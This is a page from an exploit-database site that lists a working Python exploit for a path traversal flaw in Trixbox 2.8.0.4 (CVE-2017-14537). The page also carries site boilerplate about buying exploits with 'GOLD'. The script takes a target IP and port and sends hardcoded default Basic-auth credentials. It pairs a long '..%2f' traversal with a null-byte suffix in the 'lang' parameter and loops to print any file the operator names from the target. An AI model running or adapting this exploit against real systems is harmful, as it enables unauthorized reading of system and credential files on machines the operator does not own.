0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Trixbox 2.8.0.4 - (lang) Path Traversal Exploit
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
# Exploit Author: Ron Jost (Hacker5preme)
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Credits to: Sachin Wagh
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
# Version: 2.8.0.4
# Tested on: Xubuntu 20.04
# CVE: CVE-2017-14537
'''
Description:
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
lang parameter to /maint/modules/home/index.php.
'''
'''
Import required modules:
'''
import requests
import sys
import urllib.parse
'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
'''
Construct malicious request:
'''
# Constructing header:
header = {
'Host': target_ip,
'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Cookie': 'template=classic; lng=en; lng=en',
'Upgrade-Insecure-Requests': '1',
'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
}
# Constructing malicious link (payload):
base_link = 'http://' + target_ip + ':' + target_port
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
base_link_addon_3 = '%00english'
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')
'''
EXPLOIT:
'''
while base_link_addon_2 != 'EXIT':
base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
print('')
exploit = requests.post(exploit_link, headers=header)
print('Contents of ' + base_link_addon_2 + ':')
for data in exploit.iter_lines():
data = data.decode('utf-8')
if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
print(data)
else:
break
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')
# 0day.today [2024-11-15] #